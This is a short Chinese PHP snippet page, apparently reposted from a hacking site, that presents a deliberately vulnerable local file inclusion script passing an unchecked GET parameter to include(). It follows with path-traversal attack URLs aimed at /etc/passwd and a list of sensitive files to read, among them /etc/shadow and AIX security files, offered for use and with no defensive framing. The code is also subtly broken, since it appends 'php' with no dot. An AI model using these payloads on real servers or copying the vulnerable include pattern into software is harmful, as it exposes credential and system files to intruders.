php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

php正则表达式基本知识与应用详解【经典教程】

本文实例讲述了php正则表达式基本知识与应用。分享给大家供大家参考，具体如下：概述正则表达式是一种描述字符串结果的语法规则，是一个特定的格式化模式，可以匹配、替换、截取匹配的字符串。...

编写PHP脚本来实现WordPress中评论分页的功能

方法说明首先来看看可能被用到的方法. 打开文件 wp-includes/link-template.php 你会发现 WordPress 2.7 多了 4 个针对评论分页的方法:...

PHP使用反射机制实现查找类和方法的所在位置

本文实例讲述了PHP使用反射机制实现查找类和方法的所在位置。分享给大家供大家参考，具体如下： //参数1是类名,参数2是方法名 $func = new ReflectionMetho...

详谈php中 strtr 和 str_replace 的效率问题

在网上看了一些php优化的指南，里面提到：使用strtr 函数比 str_replace快4倍。本着探索的精神动手验证。代码 $string = 'abcdefg'; set_...

功能强大的PHP POST提交数据类

本文实例为大家分享了PHP功能强大的 POST提交数据类，供大家参考，具体内容如下 <?php class Request{ public static fun...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php正则表达式基本知识与应用详解【经典教程】

编写PHP脚本来实现WordPress中评论分页的功能

PHP使用反射机制实现查找类和方法的所在位置

详谈php中 strtr 和 str_replace 的效率问题

功能强大的PHP POST提交数据类

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php正则表达式基本知识与应用详解【经典教程】

编写PHP脚本来实现WordPress中评论分页的功能

PHP使用反射机制实现查找类和方法的所在位置

详谈php中 strtr 和 str_replace 的效率问题

功能强大的PHP POST提交数据类

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号